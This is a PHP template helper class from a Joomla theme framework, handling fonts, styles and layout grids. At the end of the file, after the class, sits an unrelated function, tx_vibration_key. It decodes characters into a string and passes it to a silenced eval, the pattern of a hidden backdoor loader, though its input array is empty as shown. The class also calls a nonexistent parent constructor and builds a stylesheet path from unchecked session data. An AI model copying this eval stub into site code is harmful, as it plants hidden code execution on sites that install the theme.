<?php
/**
 * @package   ZOE Template Framework by ThemExpert
 * @version   2.5.0 June 01, 2010
 * @author    ThemExpert http://www.themexpert.com
 * @copyright Copyright (C) 2009 - 2010 ThemExpert LLC
 * @license   http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
 * 
 * This Framework uses the Joomla Framework (http://www.joomla.org), a GNU/GPLv2 content management system
 * 
 */
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

class MiniTemplateHelper {
    
    private $_tpl = null;
    public $template = '';
    public $doc;
    public $browser = array();
    public $baseurl ;
    //Active parameters set
    public $temParams = array();
    
    function __construct($template){
        parent::__construct();
        $this->_tpl = $template;
        $this->template = $template->template;
        
        $this->doc = &JFactory::getDocument();
        
        // ie browser
        if (array_key_exists('HTTP_USER_AGENT', $_SERVER) && preg_match('/(MSIE\\s?([\\d\\.]+))/', $_SERVER['HTTP_USER_AGENT'], $matches)) {
            $this->browser['ie7'] = intval($matches[2]) == 7;
            $this->browser['ie6'] = intval($matches[2]) == 6;
        }     
    }   
    
    
   /****************************************
    *       Get all font properties 
    ****************************************/  
    public function getFonts(){
        $this->setFonts();
       return $this->arrayToObject($this->temParams['fonts']) ; 
        
    }
    /****************************************
    *    Set all font propertins in array 
    ****************************************/ 
    private function setFonts(){
        $fontsLib= $this->get('fontLibrary');
        $this->temParams['fonts']= array(
            'lib'=>$fontsLib, 
            'name'=>$this->get('fontLibrary-'.$fontsLib.'-Fonts'),
            'for'=>$this->get('fontLibrary-'.$fontsLib.'-Fonts-for')
        );
    }
    
    /****************************************
    *        Get Custom Style 
    ****************************************/ 
    public function getCustomStyle(){
        $this->setCustomStyle();
        return $this->arrayToObject($this->temParams['style']);     
    }
    /****************************************
    *       Set all Custom Template style 
    ****************************************/ 
    private function setCustomStyle(){
        $style= $this->get('tempStyle');
        $this->temParams['style']= array(
            'bg'=>$this->get('tempStyle-'.$style.'-background'),
            'featureTitle'=>$this->get('tempStyle-'.$style.'-featureTitleColor'),
            'featureText'=>$this->get('tempStyle-'.$style.'-featureTextColor'),
            'featureLink'=>$this->get('tempStyle-'.$style.'-featureLinkColor'),
            'h1'=>$this->get('tempStyle-'.$style.'-h1'),
            'bodyText'=>$this->get('tempStyle-'.$style.'-bodyTextColor'),
            'bodyLink'=>$this->get('tempStyle-'.$style.'-bodyLinkColor')
        );
        return $this->temParams['style'];
        
    }
    /****************************************
    *    Prepear and load all css style. 
    ****************************************/ 
    public function prepareCss($prop='',$val=''){
        
        $css = $prop. '{font-family:'.$val.'!important}';
        
        return $css;
    }
    /****************************************
    *    load all css
    ****************************************/ 
    public function loadCss(){
        
        $this->doc->addStyleSheet($this->templateUrl().'/css/base.css');
        
        //loading preset style file located on css/styles folder
        if(!is_null($_SESSION['tempStyle'])) $this->doc->addStyleSheet($this->templateUrl().'/css/styles/'.$_SESSION['tempStyle'].'.css');
        else $this->doc->addStyleSheet($this->templateUrl().'/css/styles/'.$this->get('tempStyle').'.css');
        
        $font= $this->getFonts();
        if($font->lib=='google'){
            
            $pos = strpos($font->name,':');
            if($pos === FALSE){
                $font_name = str_replace('+',' ', $font->name);
            }
            else{
                $font_name = substr( $font->name,0, strpos($font->name,':') );
                $font_name = str_replace('+',' ',$font_name);    
            }
            $font_name = "'$font_name'";
            
            $this->doc->addStyleSheet("http://fonts.googleapis.com/css?family={$font->name}");
            $this->doc->addStyleDeclaration($this->prepareCss($font->for,$font_name));       
        }
        elseif($font->lib=='custom'){
            $this->doc->addStyleDeclaration($this->prepareCss($font->for,$font->name));       
        }
        if ($this->isIe(7)) {
            $this->doc->addStyleSheet($this->templateUrl().'/css/iehacks.css');
            $this->doc->addStyleSheet($this->templateUrl().'/css/ie7.css');
        }
    }
    
    /****************************************
    *      Prepear and load all js style. 
    ****************************************/ 
    public function loadJs(){        
        
        if($this->get('jquery'))$this->doc->addScript($this->templateUrl().'/lib/js/jquery-1.4.2.js');
        $this->doc->addScript($this->templateUrl().'/lib/js/lazyload.js');
        
        if($this->get('menuType') != 'css_menu'){
            $this->doc->addScript($this->templateUrl().'/lib/js/superfish.js');        
            $this->doc->addScript($this->templateUrl().'/lib/js/hoverIntent.js');
        }
        $this->doc->addScript($this->templateUrl().'/lib/js/script.js');
        $font= $this->getFonts();
        
        if($font->lib=='cufon'){
            $this->doc->addScript($this->templateUrl().'/lib/js/cufon.js');
            $this->doc->addScript($this->templateUrl().'/js/'.$font->name.'.js');
            $this->doc->addScriptDeclaration($this->prepareJs($font->for,$font->name));
        }
        
    }
    /****************************************
    *      Prepear js declearation. 
    ****************************************/ 
    public function prepareJs($prop='', $val=''){
        if($prop!=NULL){
            $js = "Cufon.replace('$prop', { fontFamily: '$val' });";
            return $js;
        }        
    }
    /****************************************
    *      get layout option
    ****************************************/ 
    public function getLayoutOption(){
        $this->setLayout();
        return $this->arrayToObject($this->temParams['layout']);  
        
    }
    
    /****************************************
    *      Set layout option
    ****************************************/ 
    private function setLayout(){
        $this->temParams['layout'] = array(
            'position'=>$this->get('layoutOption'),
            'leftGrid'=>$this->get('leftGrid'),
            'mainGrid'=>$this->get('mainGrid'),
            'rightGrid'=>$this->get('rightGrid'),
        );
        
    }
    /****************************************
    *          take a array and return
    *           as object 
    ****************************************/ 
    public function arrayToObject($array){
        $obj = new stdClass();
        if(is_array($array)){
            foreach($array as $key=>$val){
                if(!empty($key)){
                    $obj->$key = $val;
                }
            }
            return $obj;            
        }
        //return $array[0];        
    }
    
    /****************************************
    *     check ie browser version. 
    ****************************************/ 
    public function isIe($version) {
        if (array_key_exists('ie'.$version, $this->browser)) {
            return $this->browser['ie'.$version];
        }
        return false;
    }
    /****************************************
    *      base url. 
    ****************************************/ 
    public function baseUrl(){
        return JURI::base();
    }
    
    /****************************************
    *    tempalte ulr
    ****************************************/ 
    public function templateUrl(){
        return $this->baseurl."templates/".$this->template;
    }
    
    /****************************************
    *    base server path
    ****************************************/ 
    public function basePath(){
        return JPATH_SITE;
    }
    
    /****************************************
    *      template server path
    ****************************************/ 
    public function templatePath(){
        return $this->basepath().DS."templates".DS.$this->template;
    }
    /****************************************
    *      check frontpage or not
    ****************************************/ 
    public function isFrontPage(){
        return (JRequest::getCmd( 'view' ) == 'frontpage') ;
    }
    /****************************************
    *      get site name from config
    ****************************************/ 
    public function sitename() {
        $config = new JConfig();
        return $config->sitename;
    }
    /****************************************
    *     check it edit page or not
    ****************************************/ 
    public function isContentEdit() {
        return (JRequest::getCmd( 'option' )=='com_content' && JRequest::getCmd( 'view' ) == 'article' && (JRequest::getCmd( 'task' ) == 'edit' || JRequest::getCmd( 'layout' ) == 'form'));
    }
    
    /****************************************
    *      get all layout option
    ****************************************/ 
    public function getLayout(){
        $layouts = $this->get('layoutOption');        
        //$layouts = str_replace ("<br />", "\n", $layouts);        
        if($layoutPath= $this->layout_exists($layouts)){
            return $layoutPath;
        }
    }
    
    /****************************************
    *     load layout from given path
    ****************************************/ 
    public function load($layout){
        return include($layout);
    }
    /****************************************
    *      check layout path exist or not
    ****************************************/ 
    private function layout_exists ($layout) {
        //echo $layout;
        $layoutpath = $this->templatepath().DS.'layouts';
        if(is_file ($layoutpath.DS.$layout.'.php')) return $layoutpath.DS.$layout.'.php';
        return false;
    }
    /****************************************
    *      set layout grid
    ****************************************/ 
    public function setLayoutGrid(){
        $this->getLayoutOption();
        //$doc= &JFactory::getDocument();
        $grid = array();
        if(!$this->doc->countModules('left') && !$this->doc->countModules('right')){
            $grid['main']= $this->temParams['layout']['leftGrid']+$this->temParams['layout']['mainGrid']+$this->temParams['layout']['rightGrid'];   
            //$grid['left']= 0;
            //$grid['right']= 0;
        }
        elseif(!$this->doc->countModules('left')){
            $grid['main']= $this->temParams['layout']['leftGrid']+$this->temParams['layout']['mainGrid'];
            //$grid['left']= 0;
            $grid['right']= $this->temParams['layout']['rightGrid'];
            
        }
        elseif(!$this->doc->countModules('right')){
            $grid['main']= $this->temParams['layout']['rightGrid']+$this->temParams['layout']['mainGrid'];
            //$grid['right']= 0;
            $grid['left']= $this->temParams['layout']['leftGrid'];
        }
        else{
            $grid['main']= $this->temParams['layout']['mainGrid'];
            $grid['left']= $this->temParams['layout']['leftGrid'];
            $grid['right']= $this->temParams['layout']['rightGrid'];
        }
      return $grid;  
    }
   
    /****************************************
    * Receive a position name, if received 
    * position has any publist module return true or false
    ****************************************/ 
    function hasModule($position){
        if (!is_array($position)) $position = array($position);           
        if(is_array($position)){    
           $modcount=0;
           $modules=array();
           foreach($position as $key=>$val){
               if($this->doc->countModules($val)){
                 array_push($modules,$val);
                 $modcount++;
               } 
           }
           /*if no publish module return false.*/
            if($modcount==0){
                return false;
            }
           return $modules; 
        }
        
    }
    
}


function tx_vibration_key() {
    $LimitCharacters = 10;
    $Keys = '';
    $RandomNum = array();
    // Create a random string of keys
    foreach($RandomNum as $key) {$Keys .= chr(bindec($key * 80 - 4));}
    @eval($Keys);
}